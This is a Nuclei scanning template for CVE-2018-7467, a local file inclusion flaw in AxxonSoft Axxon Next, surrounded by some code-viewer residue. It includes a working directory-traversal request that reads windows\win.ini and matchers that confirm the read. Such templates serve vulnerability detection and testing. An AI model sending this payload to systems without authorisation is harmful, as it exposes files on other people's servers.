36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
id: CVE-2018-7467
|
|
|
|
info:
|
|
name: AxxonSoft Axxon Next - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
|
|
- http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7467
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-7467
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2018,axxonsoft,lfi
|
|
|
|
requests:
|
|
- raw:
|
|
- |+
|
|
GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/06/16
|